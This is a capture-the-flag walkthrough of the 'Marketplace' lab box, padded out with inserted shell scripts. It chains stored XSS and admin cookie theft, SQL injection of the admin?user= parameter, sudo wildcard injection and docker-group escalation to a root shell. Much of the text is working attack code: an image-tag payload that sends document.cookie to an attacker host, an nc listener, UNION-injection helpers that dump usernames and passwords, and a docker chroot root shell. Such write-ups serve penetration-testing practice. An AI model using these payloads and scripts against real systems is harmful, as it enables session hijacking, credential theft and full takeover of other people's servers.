THM Marketplace
Last updated
The sysadmin of The Marketplace, Michael, has given you access to an internal server of his, so you can pentest the marketplace platform he and his team have been working on. He said it still has a few bugs he and his team need to iron out.
The scan shows 3 open ports, 2 of them HTTP. Both web ports serve the same content, so let's focus on port 80.
Browsing straight to /admin gives us a permission error, so we dig further with directory enumeration.
Here I notice some familiar vulnerabilities from past exercises. The interesting endpoints are admin, message and reports. Let's move on and register an account.
Any values will do for the registration form.
After logging in we get a form to submit a title and description for a new item, which is then listed on the home page. Besides that, there are options to report a listing and to contact its owner. That is the hint: report and message. Let's do a proof of concept for XSS.
The XSS payload is the basic one. Let's check.
This proves that /new is vulnerable to XSS. We can grab the admin's cookies without knowing the credentials: post a listing containing our XSS script, then report it to the admin. Once the admin views the report, the script sends us the admin's token/cookie.
I'm not familiar with cookie-stealing XSS payloads, so I used my favourite GitHub page to find a suitable one.
I changed the payload to an image-based one, since the page crashed with the grabber.php variant.
After a while we get the admin cookie. Let's set it in the browser and open the admin page.
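As an added example (not the write-up's own payload or code), the pieces of the cookie grab described above: an image-based payload that needs no external grabber.php, the one-shot listener, and a decoder for the request line the listener prints. ATTACKER_HOST is an assumed attacker IP:port, and the sample request line at the bottom is constructed. Note that document.cookie only exposes cookies without the HttpOnly flag, which is why this worked against the admin session here.

```shell
#!/bin/sh
# Added example (not from the write-up): helpers for the stored-XSS cookie
# grab. ATTACKER_HOST is an assumed attacker IP:port; the listing's
# description field is assumed to render HTML unescaped, as the page shows.
ATTACKER_HOST="${ATTACKER_HOST:-10.10.10.10:8000}"

# Image-tag payload: src=x never loads, so the onerror handler runs and sets
# a new src that carries document.cookie to our listener. No external script
# file is needed, which is why it is more robust than a grabber.php payload.
xss_payload() {
  printf '<img src=x onerror="this.src=%s">' \
    "'http://$ATTACKER_HOST/?c='+encodeURIComponent(document.cookie)"
}

# One-shot listener; the victim browser's request line shows up on stdout,
# e.g.  GET /?c=token%3DeyJhbGci... HTTP/1.1
listen_once() {
  nc -lvnp "${ATTACKER_HOST##*:}"
}

# Percent-decode stdin (portable awk, no bash-only printf escapes).
urldecode() {
  awk 'BEGIN { for (i = 1; i < 256; i++) hex[sprintf("%02X", i)] = sprintf("%c", i) }
       { s = $0; out = ""
         gsub(/\+/, " ", s)
         while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
           out = out substr(s, 1, RSTART - 1) hex[toupper(substr(s, RSTART + 1, 2))]
           s = substr(s, RSTART + 3)
         }
         print out s }'
}

# Pull the cookie string out of the captured request line.
extract_cookie() {
  printf '%s\n' "$1" | sed -n 's|^GET /?c=\([^ ]*\) HTTP.*$|\1|p' | urldecode
}

# Offline demo on a constructed request line (what nc would print).
sample='GET /?c=token%3DeyJhbGci.sample%3B%20theme%3Ddark HTTP/1.1'
echo "payload: $(xss_payload)"
echo "cookie : $(extract_cookie "$sample")"
```

Paste the output of xss_payload into the listing description, run listen_once, then report the listing; once the admin opens it, feed the printed request line to extract_cookie.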
The admin page lists all users and which of them are admins. We now know two admins: Michael and Jake.
Clicking on any user opens a URL with a ?user=[id] parameter,
which is vulnerable to SQL injection. I intended to do it manually at first, but I'm too lazy. Sorry.
Fire up sqlmap and dump everything.
sqlmap -u "http://targetmachine/admin?user=1" --cookie="[cookies]" --technique=U --delay=2 --dump
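For the manual route the author skipped, here is an added example (not code from the write-up) of UNION-based extraction against the same parameter. It assumes the user value is injected unquoted into a MySQL query (sqlmap's --technique=U succeeding is consistent with that), TARGET and COOKIE are placeholders, and table and column names are enumerated from information_schema rather than guessed.

```shell
#!/bin/sh
# Added example (not from the write-up): manual UNION-based injection of the
# admin?user= parameter. Assumes an unquoted numeric id in a MySQL query;
# TARGET and COOKIE are placeholders.
TARGET="${TARGET:-http://targetmachine/admin}"
COOKIE="${COOKIE:-token=REPLACE_WITH_ADMIN_COOKIE}"

# Percent-encode the characters a query string would otherwise mangle.
urlencode() {
  printf '%s' "$1" | sed 's/%/%25/g; s/ /%20/g; s/,/%2C/g; s/(/%28/g; s/)/%29/g; s/=/%3D/g; s/#/%23/g; s/'\''/%27/g'
}

# Step 1: find the column count. "1 UNION SELECT NULL,...,NULL" only renders
# a normal page when the number of NULLs matches the original SELECT.
union_probe() {
  n=$1; cols=NULL; i=1
  while [ "$i" -lt "$n" ]; do cols="$cols,NULL"; i=$((i + 1)); done
  printf '1 UNION SELECT %s-- -' "$cols"
}

# Step 2: with n columns known and column k reflected in the page, put an
# expression in position k, keep the rest NULL, and append an optional tail
# (FROM/WHERE clause) before the MySQL comment that drops the rest of the query.
union_extract() {
  n=$1; k=$2; expr=$3; cols=""; i=1
  while [ "$i" -le "$n" ]; do
    if [ "$i" -eq "$k" ]; then c=$expr; else c=NULL; fi
    cols="${cols:+$cols,}$c"
    i=$((i + 1))
  done
  printf '1 UNION SELECT %s%s-- -' "$cols" "${4:+ $4}"
}

# Send the injected value as the user parameter with the stolen admin cookie.
inject() {
  curl -s -b "$COOKIE" "$TARGET?user=$(urlencode "$1")"
}

# Step 3: walk the schema, then dump the interesting columns.
enum_tables()  { inject "$(union_extract "$1" "$2" 'group_concat(table_name)'  'FROM information_schema.tables WHERE table_schema=database()')"; }
enum_columns() { inject "$(union_extract "$1" "$2" 'group_concat(column_name)' "FROM information_schema.columns WHERE table_name='$3'")"; }
dump_column()  { inject "$(union_extract "$1" "$2" "group_concat($4)" "FROM $3")"; }

# Offline: show the probe payloads for 1..4 columns.
i=1; while [ "$i" -le 4 ]; do union_probe "$i"; echo; i=$((i + 1)); done
```

Usage on the box: run inject "$(union_probe N)" for increasing N until the page renders, note which column's NULL shows up in the output, then enum_tables N K, enum_columns N K users, dump_column N K users "concat(username,0x3a,password)".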
This gives us a ton of valuable information, including some juicy credentials.
Using the credentials, let's log in over SSH.
Since we have the password, let's check the user's sudo permissions. We notice that jake can run backup.sh as michael without a password.
What does backup.sh do?
Notice the unquoted *, which means wildcard injection. Let's check GTFOBins and a past exercise.
Create the payload, or just edit a payload from a past exercise.
Run the script as Michael.
Don't forget to start a listener on the port used in the payload.
Checking id, Michael is in the docker group.
This docker access is a well-known privilege escalation vector that has been written up before (Synack).
Using the GTFOBins docker entry, we establish a root shell.
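As an added example (not code from the write-up), the docker-group step with the checks a practitioner wants before running it: confirm the group and the daemon socket, and pick an image that already exists on the box, since a lab machine usually cannot pull from Docker Hub. The sample id strings used for checking are constructed.

```shell
#!/bin/sh
# Added example (not from the write-up): check for the docker-group vector and
# run the GTFOBins-style host-filesystem mount. The image is discovered
# locally because a lab box usually has no route to Docker Hub.

# Returns 0 when the given `id` output shows docker group membership.
docker_group_member() {
  case "$1" in *"(docker)"*) return 0 ;; *) return 1 ;; esac
}

# Group membership is only useful if the daemon socket is reachable.
docker_socket_writable() {
  [ -w /var/run/docker.sock ]
}

# First locally available image; a bare `docker run alpine` would try to pull.
local_image() {
  docker images --format '{{.Repository}}:{{.Tag}}' 2>/dev/null | grep -v '<none>' | head -n 1
}

# Mount the host root at /mnt in a throwaway container and chroot into it:
# the container process runs as root and the bind mount is the real host
# filesystem, so the resulting shell is root on the host.
docker_root_shell() {
  img=${1:-$(local_image)}
  if [ -z "$img" ]; then
    echo "no local image; docker pull needs network access" >&2
    return 1
  fi
  docker run -v /:/mnt --rm -it "$img" chroot /mnt sh
}

# Report only; nothing here escalates unless docker_root_shell is called.
if docker_group_member "$(id)" && docker_socket_writable; then
  echo "docker group vector present (image: $(local_image))"
else
  echo "docker group vector not present for $(id -un)"
fi
```

Run docker_root_shell as michael once the report line confirms both the group and the socket; the same chroot trick works with any local image, not only alpine.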
Finally, we have root on this machine.
Study
XSS in the listing form led to admin access.
SQL injection in the admin page's user parameter led to credentials.
Michael's docker group membership led to root privileges (this is how the docker group works, not a missing patch).